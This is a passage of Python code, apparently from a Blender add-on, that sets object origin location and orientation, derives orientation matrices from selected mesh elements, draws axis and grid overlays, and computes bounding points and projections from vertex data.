def vectors_remap(vx,vy,vz,sot):\n\n\tif not sot.z_rem:\n\t\treturn vx,vy,vz\n\n\txr,yr,zr = vx,vy,vz\n\tzax = sot.z_axis\n\n\tif zax == 'z+':\n\t\trem = sot.rem_zp \n\t\tvz = zr\n\t\tif rem == '1': vx,vy = xr,yr\n\t\telif rem == '2': vx,vy = yr,xr*-1\n\t\telif rem == '3': vx,vy = xr*-1,yr*-1\n\t\telif rem == '4': vx,vy = yr*-1,xr\n\n\telif zax == 'z-':\n\t\trem = sot.rem_zn \n\t\tvz = zr*-1\n\t\tif rem == '1': vx,vy = xr,yr*-1\n\t\telif rem == '2': vx,vy = yr,xr\n\t\telif rem == '3': vx,vy = xr*-1,yr\n\t\telif rem == '4': vx,vy = yr*-1,xr*-1\n\n\telif zax == 'y+':\n\t\trem = sot.rem_yp\n\t\tvz = yr\n\t\tif rem == '1': vx,vy = xr,zr*-1\n\t\telif rem == '2': vx,vy = zr,xr\n\t\telif rem == '3': vx,vy = xr*-1,zr\n\t\telif rem == '4': vx,vy = zr*-1,xr*-1\n\n\telif zax == 'y-':\n\t\trem = sot.rem_yn\n\t\tvz = yr*-1\n\t\tif rem == '1': vx,vy = xr,zr\n\t\telif rem == '2': vx,vy = zr,xr*-1\n\t\telif rem == '3': vx,vy = xr*-1,zr*-1\n\t\telif rem == '4': vx,vy = zr*-1,xr\n\n\telif zax == 'x+':\n\t\trem = sot.rem_xp\n\t\tvz = xr\n\t\tif rem == '1': vx,vy = zr*-1,yr\n\t\telif rem == '2': vx,vy = yr,zr\n\t\telif rem == '3': vx,vy = zr,yr*-1\n\t\telif rem == '4': vx,vy = yr*-1,zr*-1\n\n\telif zax == 'x-':\n\t\trem = sot.rem_xn\n\t\tvz = xr*-1\n\t\tif rem == '1': \tvx = zr\n\t\telif rem == '2': vx,vy = yr,zr*-1\n\t\telif rem == '3': vx,vy = zr*-1,yr*-1\n\t\telif rem == '4': vx,vy = yr*-1,zr\n\n\treturn vx,vy,vz\n\ndef object_in_edit(bob,sob_r):\n\teob = []\n\tfor ob in sob_r:\n\t\tif ob.mode == 'EDIT': eob.append(ob)\n\t\telif ob.mode == 'OBJECT': ob.select_set(False)\n\tif eob != []: bpy.ops.object.editmode_toggle()\n\tbob.select_all(action='DESELECT')\n\treturn eob\n\ndef recover_edit(eob,bcv,aob_r,sob_r):\n\tbcv.objects.active = aob_r\n\tif eob != []:\n\t\tfor ob in eob: ob.select_set(True)\n\t\tbpy.ops.object.editmode_toggle()\n\tfor ob in sob_r: ob.select_set(True)\n\treturn\n\n# def fix_children_loc(x,y,z,tob,bcv,oob):\n# \tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n# \tfix_vector = mu.Vector(tob.matrix_world.col[3][:3]) - mu.Vector((x,y,z))\n# \tfor tob in childrens:\n# \t\t#if not tob in oob: \n# \t\ttob.select_set(True)\n# \t\tbpy.ops.transform.translate(value= fix_vector)\n# \t\ttob.select_set(False)\n# \t\t# else:\n# \t\t# \tprint(tob.name + 'was ignored in children fix')\n\ndef fix_children_clear(tob):\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor tob in childrens:\n\t\ttob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\ttob.select_set(False)\n\treturn childrens\n\ndef set_origin_location(x,y,z,tob,bcv,oob=[]):\n\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\tcob.select_set(False)\n\n\ttob.select_set(True)\n\tbcv.objects.active = tob\n\tloc = tob.matrix_world.col[3]\n\tpos = mu.Vector((x,y,z,1))\n\tdif = mu.Vector((loc - pos)[:3])\n\ttob.matrix_world.col[3] = pos\n\tobm = tob.matrix_world\n\ttmt = mu.Matrix.Identity(4)\n\ttmt.col[3] = tov4(obm.to_3x3().inverted() @ dif,1)\t\t\n\ttob.data.transform(tmt)\n\tif tob.type == 'ARMATURE':\n\t\tbpy.ops.object.editmode_toggle()\n\t\tbpy.ops.object.editmode_toggle()\n\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_set(type='OBJECT', keep_transform=True)\n\t\tcob.select_set(False)\n\n\ttob.select_set(False)\n\treturn\n\ndef set_origin_orientation(x,y,z,tob,bcv,bob):\n\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\tcob.select_set(False)\n\n\ttob.select_set(True)\n\tbcv.objects.active = tob\n\trmt = (mu.Euler((x,y,z),'XYZ')).to_matrix()\n\tloc = tob.matrix_world.col[3]\n\tscl = tob.matrix_world.to_scale()\n\trmt_m = rmt.to_4x4()\n\trmt_m.col[0] = rmt_m.col[0]*scl[0]\n\trmt_m.col[1] = rmt_m.col[1]*scl[1]\n\trmt_m.col[2] = rmt_m.col[2]*scl[2] \t\n\trmt_m.col[3] = loc\n\trmt = (tob.matrix_world.to_3x3().inverted() @ rmt).to_4x4()\n\trmt.col[0] = rmt.col[0]*scl[0]\n\trmt.col[1] = rmt.col[1]*scl[1]\n\trmt.col[2] = 
rmt.col[2]*scl[2]\n\ttob.data.transform(rmt.inverted())\n\ttob.matrix_world = rmt_m\n\tbob.transform_apply(location = False, rotation= False, scale= True, properties=False)\n\tif tob.type == 'ARMATURE':\n\t\tbpy.ops.object.editmode_toggle()\n\t\tbpy.ops.object.editmode_toggle()\n\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_set(type='OBJECT', keep_transform=True)\n\t\tcob.select_set(False)\n\n\ttob.select_set(False)\n\treturn\n\ndef get_preset_loc_rot(sot,loc):\n\tif pr_values != {}:\n\t\tif loc: return pr_values.get(sot.loc_rot_presets)[0]\n\t\telse: return pr_values.get(sot.loc_rot_presets)[1]\n\ndef get_cursor_loc_rot(bco,sot,loc):\n\tmt = bco.scene.cursor.matrix\n\tif loc:\n\t\treturn mu.Vector(mt.col[3][:3])\n\telse:\n\t\tmt = mt.to_3x3()\n\t\tvx,vy,vz = mu.Vector(mt.col[0]),mu.Vector(mt.col[1]),mu.Vector(mt.col[2])\n\t\tvx,vy,vz = vectors_remap(vx,vy,vz,sot)\n\t\treturn combine_matrix_v3(vx,vy,vz)\n\ndef get_element_loc(self,bco,sot,aob):\n\tbmd = bmesh.from_edit_mesh(bco.edit_object.data)\n\tbma = bmd.select_history.active\n\n\tif bma == None: return report(self,'No active element in selection!!!')\n\telse:\n\t\tobm = aob.matrix_world\n\t\tif str(bma).find('BMVert') == 1:\n\t\t\tco = bma.co\n\t\telse:\n\t\t\tco = mu.Vector((0,0,0))\n\t\t\tverts = bma.verts\n\t\t\tfor v in verts:\n\t\t\t\tco += v.co\n\t\t\tco = co/len(verts)\n\t\tif obm.to_scale() != (1.0,1.0,1.0):\n\t\t\tco = obm @ co\n\t\treturn co\n\ndef get_element_vectors(self,bco,sot,aob):\n\tbmd = bmesh.from_edit_mesh(bco.edit_object.data)\n\tbma = bmd.select_history.active\n\tvzw = mu.Vector((0,0,1))\n\tobm = aob.matrix_world\n\n\tif bma == None: return report(self,'No active element in selection!!!')\n\telse:\n\t\tif str(bma).find('BMVert') == 1:\n\n\t\t\t# Vertex Normals\n\t\t\tif len(bma.link_faces) == 0:\n\t\t\t\tvz = vector_fix(obm, (bma.co - mu.Vector(obm.col[3][:3])))\n\t\t\t\tif vz[2]>0:\n\t\t\t\t\tm = -1\n\t\t\t\telse:\n\t\t\t\t\tvzw = vzw*-1\n\t\t\t\t\tm = 1\n\t\t\t\t\n\t\t\t\tif vzw.dot(vz) > 0.5:\n\t\t\t\t\tvy = (vzw - (vzw.dot(vz)*vz)).normalized() * m\n\t\t\t\telse:\n\t\t\t\t\tm = m*-1\n\t\t\t\t\tvm = (vz * mu.Vector((1,1,0))).normalized()\n\t\t\t\t\tvy = (vm - (vm.dot(vz)*vz)).normalized() * m\n\t\t\t\t\n\t\t\t\tif (abs(sum(vy[:]))) == 0:\n\t\t\t\t\tif abs(vz[2]) == 1:\n\t\t\t\t\t\tvy = mu.Vector((0,1,0))\n\t\t\t\t\telif vz[2] == 0:\n\t\t\t\t\t\tvy = mu.Vector((0,0,-1))\n\n\t\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t\telse:\n\t\t\t\tvz = vector_fix(obm, bma.normal)\n\t\t\t\tif vz[2]>0:\n\t\t\t\t\tm = -1\n\t\t\t\telse:\n\t\t\t\t\tvzw = vzw*-1\n\t\t\t\t\tm = 1\n\t\t\t\t\n\t\t\t\tif vzw.dot(vz) > 0.5:\n\t\t\t\t\tvy = (vzw - (vzw.dot(vz)*vz)).normalized() * m\n\t\t\t\telse:\n\t\t\t\t\tm = m*-1\n\t\t\t\t\tvm = (vz * mu.Vector((1,1,0))).normalized()\n\t\t\t\t\tvy = (vm - (vm.dot(vz)*vz)).normalized() * m\n\n\t\t\t\tif (abs(sum(vy[:]))) == 0:\n\t\t\t\t\tif abs(vz[2]) == 1:\n\t\t\t\t\t\tvy = mu.Vector((0,1,0))\n\t\t\t\t\telif vz[2] == 0:\n\t\t\t\t\t\tvy = mu.Vector((0,0,-1))\n\n\t\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t# Edges Normals\n\t\telif str(bma).find('BMEdge') == 1: \n\t\t\tvy = vector_fix(obm, (bma.verts[0].co - bma.verts[1].co).normalized())\n\t\t\tif len(bma.link_faces) == 0:\n\t\t\t\tif vy[2]>0:\n\t\t\t\t\tm = -1\n\t\t\t\telse:\n\t\t\t\t\tvzw = vzw*-1\n\t\t\t\t\tm = 1\n\n\t\t\t\tif vzw.dot(vy) > 0.5:\n\t\t\t\t\tvz = (vzw - (vzw.dot(vy)*vy)).normalized() * m\n\t\t\t\telse:\n\t\t\t\t\tm = m*-1\n\t\t\t\t\tvm = (vy * mu.Vector((1,1,0))).normalized()\n\t\t\t\t\tvz = (vm - 
(vm.dot(vy)*vy)).normalized() * m\n\t\t\telif len(bma.link_faces) == 1:\n\t\t\t\tvz = vector_fix(obm, bma.link_faces[0].normal)\n\t\t\telse:\n\t\t\t\tvz = ((vector_fix(obm, bma.link_faces[0].normal) + vector_fix(obm, bma.link_faces[1].normal))/2).normalized()\n\n\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t# Faces Normals\n\t\telse: \n\t\t\tvz = vector_fix(obm, bma.normal)\n\t\t\tprint(vz)\n\t\t\tif len(bma.verts)\t== 3:\n\t\t\t\tprint('FACE Triangle')\n\t\t\t\teils = (sorted([(i,e.calc_length()) for i,e in enumerate(bma.edges)], key=lambda e: e[1]))\n\t\t\t\tei = eils[0][0] if eils[1][1] / eils[0][1] > 1.262169 else eils[2][0]\n\t\t\t\tvy = vector_fix(obm, (bma.edges[ei].verts[0].co - bma.edges[ei].verts[1].co).normalized())\n\t\t\t\tvy = vy-(vy.dot(vz)*vz)\n\n\t\t\t\t#vy = vector_fix(obm, (bma.calc_tangent_edge())*-1)\n\t\t\telif len(bma.verts) == 4:\n\t\t\t\tprint('FACE Quad')\n\t\t\t\tvy = vector_fix(obm, ((bma.calc_tangent_edge_pair()).normalized())*-1)\n\t\t\t\tvy = vy-(vy.dot(vz)*vz)\n\t\t\telse:\n\t\t\t\tprint('FACE Ngon')\n\t\t\t\tle,ei = 0,-1\n\t\t\t\t#c = 0 remove\n\t\t\t\tfor i,e in enumerate(bma.edges):\n\t\t\t\t\tif e.calc_length() > le: le,ei = e.calc_length(),i\n\t\t\t\tvy = vector_fix(obm, (bma.edges[ei].verts[0].co - bma.edges[ei].verts[1].co).normalized())\n\t\t\t\tvy = vy-(vy.dot(vz)*vz)\n\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t#vx,vy,vz = vectors_remap(vx,vy,vz,sot)\n\n\t\treturn combine_matrix_v3(vx,vy,vz)\n\ndef get_object_loc_rot(self,bco,sot,loc):\n\n\tbcv = bco.view_layer\n\taob = bcv.objects.active\n\n\tif aob == None: return report(self,'No active object in selection!!!')\n\telse:\n\t\tif loc:\n\t\t\treturn mu.Vector(aob.matrix_world.col[3][:3])\n\t\telse:\n\t\t\tmt = aob.matrix_world.to_3x3().normalized()\n\t\t\tvx,vy,vz = mu.Vector(mt.col[0]),mu.Vector(mt.col[1]),mu.Vector(mt.col[2])\n\t\t\tvx,vy,vz = vectors_remap(vx,vy,vz,sot)\n\t\t\treturn combine_matrix_v3(vx,vy,vz)\n\ndef set_manual_values(sot,value,param):\n\tif param == 'loc':\n\t\tsot.loc_x,sot.loc_y,sot.loc_z = value\n\telif param == 'rot':\n\t\tif abs(value[0]) < 0.0001: value[0] = 0\n\t\tif abs(value[1]) < 0.0001: value[1] = 0\n\t\tif abs(value[2]) < 0.0001: value[2] = 0\n\t\tsot.rot_x,sot.rot_y,sot.rot_z = value\n\telif param == 'czp':\n\t\tsot.czp_x,sot.czp_y,sot.czp_z = value\n\treturn\n\ndef aob_check(aob):\n\tif aob == None: return (True,'No ACTIVE object in selection!!!!')\n\telse: return (False,'')\n\ndef mesh_check(cob):\n\tif cob.type != 'MESH': return (True,'One of selected objects is not MESH type.')\n\telse: return (False,'')\n\ndef screen_size(bco,loc,pdc):\n\ts3d = bco.space_data.region_3d\n\ta3d = bco.area.spaces.active.region_3d\n\n\tif s3d.view_perspective == 'ORTHO':\n\t\tscl = a3d.view_distance/10\n\telif s3d.view_perspective == 'PERSP':\n\t\tvmt = a3d.view_matrix\n\t\tdis = distance(vmt @ loc,mu.Vector((0,0,0)))\n\t\tif dis<30 and pdc:\n\t\t\tscl = abs(dis)/remap(1,10,0,30,dis)\n\t\telse:\n\t\t\tscl = abs(dis)/10\n\n\telse:\n\t\tzo = a3d.view_camera_zoom\n\t\tvmt = a3d.view_matrix\n\t\tif zo>0:\n\t\t\tv = 3.14**(((30+((zo)+30))/30)*remap(1,0.26,0,1,math.sqrt((zo/600)**0.7)))\n\t\telse:\n\t\t\tv = 3.14**((30+((zo)+30))/30)\n\n\t\tdis = distance(vmt @ loc,mu.Vector((0,0,0)))\n\t\tif dis<30 and pdc:\n\t\t\tscl = abs(dis)/remap(1,v,0,30,dis)\n\t\telse:\n\t\t\tscl = abs(dis)/v\n\n\treturn scl\n\ndef draw_loc_rot_axis_main(self,context):\n\tbco = bpy.context\n\tsot = context.scene.sot_props\n\n\tvc = [(-0.3, 0.0, 0.0), (-0.1, 0.0, 0.0),\n\t\t(0.0, -0.3, 0.0), (0.0, -0.1, 0.0),\n\t\t(0.0, 0.0, 
-0.3), (0.0, 0.0, -0.1),\n\t\t(0.1, 0.0, 0.0), (1.0, 0.0, 0.0),\n\t\t(0.0, 0.1, 0.0), (0.0, 1.0, 0.0),\n\t\t(0.0, 0.0, 0.1), (0.0, 0.0, 1.0)]\n\tvcm = []\n\n\tloc = mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\teuler = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z),'XYZ')\n\trot = euler.to_matrix()\n\n\tscl = screen_size(bco,loc,False)\n\n\tfor v in vc:\n\t\tv = (rot @ (mu.Vector(v) * scl)) + loc\n\t\tvcm.append(v)\n\n\tshader = gpu.shader.from_builtin('3D_SMOOTH_COLOR')\n\tcol = [(1.0, 1.0, 1.0, 0.8), (1.0, 1.0, 1.0, 0.8),\n\t\t(1.0, 1.0, 1.0, 0.8), (1.0, 1.0, 1.0, 0.8),\n\t\t(1.0, 1.0, 1.0, 0.8), (1.0, 1.0, 1.0, 0.8),\n\t\t(1.0, 0.0, 0.0, 1.0), (1.0, 0.0, 0.0, 1.0),\n\t\t(0.0, 1.0, 0.0, 1.0), (0.0, 1.0, 0.0, 1.0),\n\t\t(0.0, 0.0, 1.0, 1.0), (0.0, 0.0, 1.0, 1.0)]\n\n\tdraw_this(shader,vcm,col,6)\n\treturn\n\ndef draw_loc_rot_presets_main(self,context):\n\tbco = bpy.context\n\tsot = context.scene.sot_props\n\n\tglobal pr_values\n\tglobal colors\n\tglobal grid\n\tglobal axis_base\n\n\tif pr_values != {}:\n\t\tprv = pr_values.get(sot.loc_rot_presets)\n\t\tloc = mu.Vector(prv[0])\n\t\teuler = mu.Euler(prv[1],'XYZ')\n\t\trot = euler.to_matrix()\n\telse:\n\t\tloc = mu.Vector((0,0,0))\n\t\trot = mu.Matrix.Identity(3)\n\n\tscl_steps = [(700,500),(60,50),(5,5),(1,1),(0.5,0.5),(0.07,0.125)]\n\tscl = screen_size(bco,loc,False)\n\tscli = 1\n\tif scl>=1:\n\t\tfor st in scl_steps:\n\t\t\tif scl>=st[0]:\n\t\t\t\tscli = st[1] \n\t\t\t\tbreak\t\n\telse:\n\t\tfor st in scl_steps[::-1]:\n\t\t\tif scl<=st[0]:\n\t\t\t\tscli = st[1] \n\t\t\t\tbreak\t\n\n\n\tgrid_crd = []\n\tgrid_col = []\n\n\tfor crd in grid:\n\t\tif scli != 1:\n\t\t\tcrd = (rot @ (mu.Vector(crd) * scli)) + loc\n\t\telse:\n\t\t\tcrd = (rot @ mu.Vector(crd)) + loc\n\t\tgrid_crd.append(crd)\n\t\tgrid_col.append((1,1,1,1))\n\t\t\n\n\n\taxis_crd = []\n\taxis_col = []\n\n\tfor cc in axis_base:\n\t\tcrd = (rot @( mu.Vector(cc[0]) * scl)) + loc\n\t\taxis_crd.append(crd)\n\t\taxis_col.append(cc[1])\t\t\n\n\tshader = gpu.shader.from_builtin('3D_SMOOTH_COLOR')\n\tdraw_this(shader,grid_crd,grid_col)\n\tdraw_this(shader,axis_crd,axis_col,2)\n\treturn\n\ndef matrices_vdata_get(spot_set_mode,aob,sob):\n\n\tglobal spot_sob_matrices_vdata\n\tspot_sob_matrices_vdata.clear()\n\n\tif spot_set_mode == '1' or spot_set_mode == '3':\n\t\tif aob != None:\n\t\t\tif aob.type == 'MESH':\n\t\t\t\tif aob.mode == 'EDIT': aob.update_from_editmode()\n\t\t\t\tv_num = len(aob.data.vertices)\n\t\t\t\tvdata = np.empty(v_num*3, dtype=np.float32)\n\t\t\t\taob.data.vertices.foreach_get('co',vdata)\n\t\t\t\tvdata = np.reshape(vdata,(v_num,3))\n\t\t\t\tobm = aob.matrix_world\n\t\t\t\tfor v in range(vdata.shape[0]): vdata[v] = (obm @ mu.Vector(vdata[v]))[:]\n\t\t\t\tspot_sob_matrices_vdata.append((obm,vdata))\n\n\telif spot_set_mode == '2':\n\t\tmvdata = np.empty(0, dtype=np.float32)\n\t\tfor ob in sob:\n\t\t\tif ob.type == 'MESH':\n\t\t\t\tif ob.mode == 'EDIT': ob.update_from_editmode()\n\t\t\t\tv_num = len(ob.data.vertices)\n\t\t\t\tvdata = np.empty(v_num*3, dtype=np.float32)\n\t\t\t\tob.data.vertices.foreach_get('co',vdata)\n\t\t\t\tvdata = np.reshape(vdata,(v_num,3))\n\t\t\t\tobm = ob.matrix_world\n\t\t\t\tfor v in range(vdata.shape[0]): vdata[v] = (obm @ mu.Vector(vdata[v]))[:]\n\t\t\t\tmvdata = np.append(mvdata,vdata)\n\t\tmvdata = np.reshape(mvdata, (mvdata.size//3, 3))\n\t\tif mvdata != []:\n\t\t\tif aob != None and aob.type == 'MESH': obm = aob.matrix_world\n\t\t\telif aob != None: obm = aob.matrix_world\n\t\t\telse:\n\t\t\t\tfor ob in sob:\n\t\t\t\t\tif ob.type == 
'MESH':\n\t\t\t\t\t\tobm = ob.matrix_world\n\t\t\t\t\t\tbreak\n\t\t\tobm = aob.matrix_world if aob != None else sob[0].matrix_world\n\t\t\tspot_sob_matrices_vdata.append((obm,mvdata))\n\n\telse:\n\t\tfor ob in sob:\n\t\t\tif ob.type == 'MESH':\n\t\t\t\tif ob.mode == 'EDIT': ob.update_from_editmode()\n\t\t\t\tv_num = len(ob.data.vertices)\n\t\t\t\tvdata = np.empty(v_num*3, dtype=np.float32)\n\t\t\t\tob.data.vertices.foreach_get('co',vdata)\n\t\t\t\tvdata = np.reshape(vdata,(v_num,3))\n\t\t\t\tobm = ob.matrix_world\n\t\t\t\tfor v in range(vdata.shape[0]): vdata[v] = (obm @ mu.Vector(vdata[v]))[:]\n\t\t\t\tspot_sob_matrices_vdata.append((obm,vdata))\n\ndef rotation_matrix_get(spot_set_space,bco,sot,aob,sob):\n\n\tglobal pr_values\n\tglobal spot_orient_matrix\n\n\tif spot_set_space == '5' and pr_values == {}:\n\t\tspot_set_space = '1' \n\n\tif spot_set_space == '1': # Global\n\t\tspot_orient_matrix = mu.Matrix.Identity(3)\t\n\telif spot_set_space == '2': # Local\n\t\tif not aob_check(aob)[0]:\n\t\t\tspot_orient_matrix = aob.matrix_world.to_3x3().normalized()\n\t\telif 'MESH' in [ob.type for ob in sob]:\n\t\t\tfor ob in sob:\n\t\t\t\tif ob.type == 'MESH':\n\t\t\t\t\tspot_orient_matrix = ob.matrix_world.to_3x3().normalized()\n\t\t\t\t\tbreak\n\t\telse:\n\t\t\tspot_orient_matrix = mu.Matrix.Identity(3)\n\telif spot_set_space == '3': # View\n\t\tspot_orient_matrix = bco.area.spaces.active.region_3d.view_matrix.to_3x3().inverted()\n\telif spot_set_space == '4': # Cursor\n\t\tspot_orient_matrix = bco.scene.cursor.matrix.to_3x3()\n\telse: # Preset\n\t\tif pr_values != {}:\n\t\t\teuler = mu.Euler((pr_values.get(sot.loc_rot_presets)[1]),'XYZ')\n\t\t\tspot_orient_matrix = euler.to_matrix()\n\t\telse:\n\t\t\tspot_orient_matrix = mu.Matrix.Identity(3)\n\ndef vcv(co,v,a,av,avv,avc,adv):\n\tav = a\n\tif abs(av - round(avv[v]/avc,4)) <= adv:\n\t\tavv,avc = avv+co,avc+1 \t \n\telse:\n\t\tavv,avc = co,1\n\n\treturn av,avv,avc\n\ndef spots_calc(mode,space):\n\n\tglobal spot_sob_matrices_vdata\n\tglobal spot_orient_matrix\n\tglobal spot_sps_data\n\tspot_sps_data.clear()\n\n\tfor data in spot_sob_matrices_vdata:\n\n\t\tobm = data[0]\n\t\torm = data[0].to_3x3() if space == '2' and mode != '2' else spot_orient_matrix\n\n\t\torme = orm.to_euler()\n\t\torm_unic = True if orm != mu.Matrix.Identity(3) else False\n\t\tloc = orm.inverted() @ mu.Vector(data[0].col[3][:3]) if orm_unic else mu.Vector(data[0].col[3][:3])\n\n\t\tvdata = data[1]\n\t\tfv = orm.inverted() @ Vector(vdata[0]) if orm_unic else Vector(vdata[0])\n\t\tffv = orm @ fv\n\n\t\txn,xp,yn,yp,zn,zp = round(fv[0],4),round(fv[0],4),round(fv[1],4),round(fv[1],4),round(fv[2],4),round(fv[2],4)\n\t\txnv,xpv,ynv,ypv,znv,zpv,csm = fv,fv,fv,fv,fv,fv,fv\n\t\txnc = xpc = ync = ypc = znc = zpc = 1\n\n\t\tadx = round(0.0002 + (0.0012 * (abs(orme[1]/3.1416) + abs(orme[2]/3.1416))),4)\n\t\tady = round(0.0002 + (0.0012 * (abs(orme[0]/3.1416) + abs(orme[2]/3.1416))),4)\n\t\tadz = round(0.0002 + (0.0012 * (abs(orme[0]/3.1416) + abs(orme[1]/3.1416))),4)\n\n\t\tfor vco in vdata[1:]:\n\t\t\tco = orm.inverted() @ Vector(vco) if orm_unic else Vector(vco)\n\t\t\t# x,y,z = round(co[0],4),round(co[1],4),round(co[2],4)\n\t\t\tx,y,z = co[0],co[1],co[2]\n\n\t\t\tif x >= xp - (adx*abs(xp/1000)) : xp,xpv,xpc = vcv(co,0,x,xp,xpv,xpc,adx)\n\t\t\tif x <= xn + (adx*abs(xn/1000)) : xn,xnv,xnc = vcv(co,0,x,xn,xnv,xnc,adx)\n\t\t\tif y >= yp - (ady*abs(yp/1000)) : yp,ypv,ypc = vcv(co,1,y,yp,ypv,ypc,ady)\n\t\t\tif y <= yn + (ady*abs(yn/1000)) : yn,ynv,ync = vcv(co,1,y,yn,ynv,ync,ady)\n\t\t\tif z >= 
zp - (adz*abs(zp/1000)) : zp,zpv,zpc = vcv(co,2,z,zp,zpv,zpc,adz)\n\t\t\tif z <= zn + (adz*abs(zn/1000)) : zn,znv,znc = vcv(co,2,z,zn,znv,znc,adz)\n\n\t\t\tcsm = csm + co\n\n\t\tboc = mu.Vector((((xn+xp)/2),((yn+yp)/2),((zn+zp)/2)))\n\t\tcom = csm/vdata.shape[0]\n\n\t\tif xnc != 1: xnv = xnv/xnc\n\t\tif xpc != 1: xpv = xpv/xpc\n\t\tif ync != 1: ynv = ynv/ync\n\t\tif ypc != 1: ypv = ypv/ypc\n\t\tif znc != 1: znv = znv/znc\n\t\tif zpc != 1: zpv = zpv/zpc\n\n\t\tsps = {'xn':xn,'xp':xp,'yn':yn,'yp':yp,'zn':zn,'zp':zp,'boc':boc,'com':com,\n\t\t\t\t'xnv':xnv,'xpv':xpv,'ynv':ynv,'ypv':ypv,'znv':znv,'zpv':zpv,'orm':orm,'loc':loc}\n\n\t\tspot_sps_data.append(sps)\n\ndef projection_calc(praxis,prdir,drp_m,drp_sm,drp_off,drp_czpb,drp_czpv):\n\n\tglobal spot_sps_data\n\tglobal spot_psp_data\n\tspot_psp_data.clear()\n\n\n\tmzp = (0,0,0)\n\tif drp_m == '1' and drp_sm == '2':\n\t\tlocs = [sps.get('loc') for sps in spot_sps_data]\n\t\tmzp = mu.Vector((0,0,0))\n\t\tfor loc in locs:\n\t\t\tmzp += loc\n\t\tmzp = mzp/len(locs)\n\n\n\tfor sps in spot_sps_data:\n\n\t\txp,xn,yp,yn,zp,zn,boc = sps.get('xp'),sps.get('xn'),sps.get('yp'),sps.get('yn'),sps.get('zp'),sps.get('zn'),sps.get('boc')\n\n\t\txc,yc,zc = boc[0],boc[1],boc[2]\n\n\t\tx = xp if prdir == '1' else xn \n\t\ty = yp if prdir == '1' else yn \n\t\tz = zp if prdir == '1' else zn \n\n\t\torm = sps.get('orm')\n\n\t\tczp = drp_czpv \n\n\t\tif orm != mu.Matrix.Identity(3): \n\t\t\tczp = orm.inverted() @ czp\n\t\tzpoint = czp if drp_czpb else (0,0,0) \n\n\t\txd = (zpoint[0] if drp_sm == '1' else mzp[0]) if drp_m == '1' else (x if drp_sm == '1' else xc)\n\t\tyd = (zpoint[1] if drp_sm == '1' else mzp[1]) if drp_m == '1' else (y if drp_sm == '1' else yc)\n\t\tzd = (zpoint[2] if drp_sm == '1' else mzp[2]) if drp_m == '1' else (z if drp_sm == '1' else zc)\n\n\t\tdtp_a = sps.get('loc')\n\t\toffset = drp_off * -1 if prdir == '1' and drp_m == '2' else drp_off\n\n\t\tif praxis == '1':\n\t\t\tdtp_b = mu.Vector((xd+offset,dtp_a[1],dtp_a[2]))\n\t\t\tdtp_c = mu.Vector((xd+offset,yd,dtp_a[2]))\n\t\t\tdtp_d = mu.Vector((xd+offset,yd,zd))\n\t\t\tdtp_e = mu.Vector((xd,yd,zd))\n\n\t\t\tbom = sps.get('xpv') if prdir == '1' else sps.get('xnv')\n\n\t\t\tpsp = {'np':mu.Vector((x,yn,zp)),'cp':mu.Vector((x,yc,zp)),'pp':mu.Vector((x,yp,zp)),\n\t\t\t\t\t'nc':mu.Vector((x,yn,zc)),'cc':mu.Vector((x,yc,zc)),'pc':mu.Vector((x,yp,zc)),\n\t\t\t\t\t'nn':mu.Vector((x,yn,zn)),'cn':mu.Vector((x,yc,zn)),'pn':mu.Vector((x,yp,zn)),\n\t\t\t\t\t'dtp_a':dtp_a,'dtp_b':dtp_b,'dtp_c':dtp_c,'dtp_d':dtp_d,'dtp_e':dtp_e,\n\t\t\t\t\t'bom':bom,'boc':boc,'com':sps.get('com')}\n\n\t\telif praxis == '2':\n\t\t\tdtp_b = mu.Vector((dtp_a[0],yd+offset,dtp_a[2]))\n\t\t\tdtp_c = mu.Vector((xd,yd+offset,dtp_a[2]))\n\t\t\tdtp_d = mu.Vector((xd,yd+offset,zd))\n\t\t\tdtp_e = mu.Vector((xd,yd,zd))\n\n\t\t\tbom = sps.get('ypv') if prdir == '1' else sps.get('ynv')\n\n\t\t\tpsp = {'np':mu.Vector((xn,y,zp)),'cp':mu.Vector((xc,y,zp)),'pp':mu.Vector((xp,y,zp)),\n\t\t\t\t\t'nc':mu.Vector((xn,y,zc)),'cc':mu.Vector((xc,y,zc)),'pc':mu.Vector((xp,y,zc)),\n\t\t\t\t\t'nn':mu.Vector((xn,y,zn)),'cn':mu.Vector((xc,y,zn)),'pn':mu.Vector((xp,y,zn)),\n\t\t\t\t\t'dtp_a':dtp_a,'dtp_b':dtp_b,'dtp_c':dtp_c,'dtp_d':dtp_d,'dtp_e':dtp_e,\n\t\t\t\t\t'bom':bom,'boc':boc,'com':sps.get('com')}\n\t\telse:\n\t\t\tdtp_b = mu.Vector((dtp_a[0],dtp_a[1],zd+offset)) \n\t\t\tdtp_c = mu.Vector((dtp_a[0],yd,zd+offset))# if dtp_a[0] >= dtp_a[1] else mu.Vector((xd,dtp_a[1],zd+drp_off))\n\t\t\tdtp_d = mu.Vector((xd,yd,zd+offset))\n\t\t\tdtp_e = 
